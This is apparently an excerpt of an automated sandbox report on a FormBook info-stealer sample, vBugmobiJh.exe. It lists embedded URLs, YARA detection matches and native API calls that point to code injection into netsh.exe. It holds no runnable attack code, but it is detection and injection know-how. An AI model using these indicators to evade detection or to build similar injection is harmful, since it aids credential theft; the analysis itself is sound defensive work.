          Source: explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: vBugmobiJh.exe, 00000001.00000003.215875793.0000000005760000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.216329040.0000000005739000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: vBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comB.TTF
          Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comM.TTFzP
          Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomm
          Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd2P
          Source: vBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comepko
          Source: vBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsP
          Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiefd$P
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: vBugmobiJh.exe, 00000001.00000003.209223636.000000000573B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comKr
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: vBugmobiJh.exe, 00000001.00000003.211716442.0000000005726000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: vBugmobiJh.exe, 00000001.00000003.211340323.0000000005727000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnO
          Source: vBugmobiJh.exe, 00000001.00000003.211098499.000000000572E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
          Source: vBugmobiJh.exe, 00000001.00000003.211340323.0000000005727000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnh
          Source: vBugmobiJh.exe, 00000001.00000003.211149216.0000000000D4D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnt
          Source: vBugmobiJh.exe, 00000001.00000003.218063402.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: vBugmobiJh.exe, 00000001.00000003.217860687.0000000005733000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/%k
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.217860687.0000000005733000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//P
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/2P
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/AP
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ntPi
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/es
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: vBugmobiJh.exe, 00000001.00000003.214371711.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/2P
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/zP
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ltt=P
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/oiolP
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/sP
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/tendHP
          Source: vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/uild$P
          Source: vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vno
          Source: vBugmobiJh.exe, 00000001.00000003.208761960.0000000005723000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: vBugmobiJh.exe, LogIn.csLong String: Length: 13656
          Source: 1.0.vBugmobiJh.exe.2d0000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 1.2.vBugmobiJh.exe.2d0000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 4.2.vBugmobiJh.exe.150000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 4.0.vBugmobiJh.exe.150000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 6.2.vBugmobiJh.exe.430000.1.unpack, LogIn.csLong String: Length: 13656
          Source: 6.0.vBugmobiJh.exe.430000.0.unpack, LogIn.csLong String: Length: 13656
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_004181AA NtCreateFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0041825C NtReadFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_004182DA NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BAA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BAB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BAA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BAA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BAAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F581B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F582E0 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F58260 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F581AA NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F582DA NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F5825C NtReadFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_00CBC2B0
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_00CB9990
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_0709C6D8
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_0709B6E8
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_07090040
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_07092F78
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_07092F88
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_0709B6D8
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_07092D28
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_07092D38
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_07090D90
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_07096291
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 1_2_0709E9A8
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0040102F
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00401030
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00408C4C
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00408C50
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0041B493
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0041CD28
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00402D87
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00402D90
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_0041CE77
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00402FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9EBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2DBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C203DA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C32B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C322AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6F900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7B090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C328EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C320A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3E824
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3DFCE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C31FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C32EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B86E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2D616
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C325DD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B60D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C31D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C32D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2D466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F5B493
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F48C50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F48C4C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F42D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F42D87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F5CD28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F5CE77
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_00F42FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03B6B150 appears 39 times
          Source: vBugmobiJh.exeBinary or memory string: OriginalFilename vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.227808975.00000000002D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKerbLogonSubmitType.exe6 vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs vBugmobiJh.exe
          Source: vBugmobiJh.exeBinary or memory string: OriginalFilename vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000004.00000002.226155480.0000000000152000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKerbLogonSubmitType.exe6 vs vBugmobiJh.exe
          Source: vBugmobiJh.exeBinary or memory string: OriginalFilename vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000006.00000002.268144606.0000000000EBC000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000006.00000000.226888250.0000000000432000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKerbLogonSubmitType.exe6 vs vBugmobiJh.exe
          Source: vBugmobiJh.exeBinary or memory string: OriginalFilenameKerbLogonSubmitType.exe6 vs vBugmobiJh.exe
          Source: vBugmobiJh.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
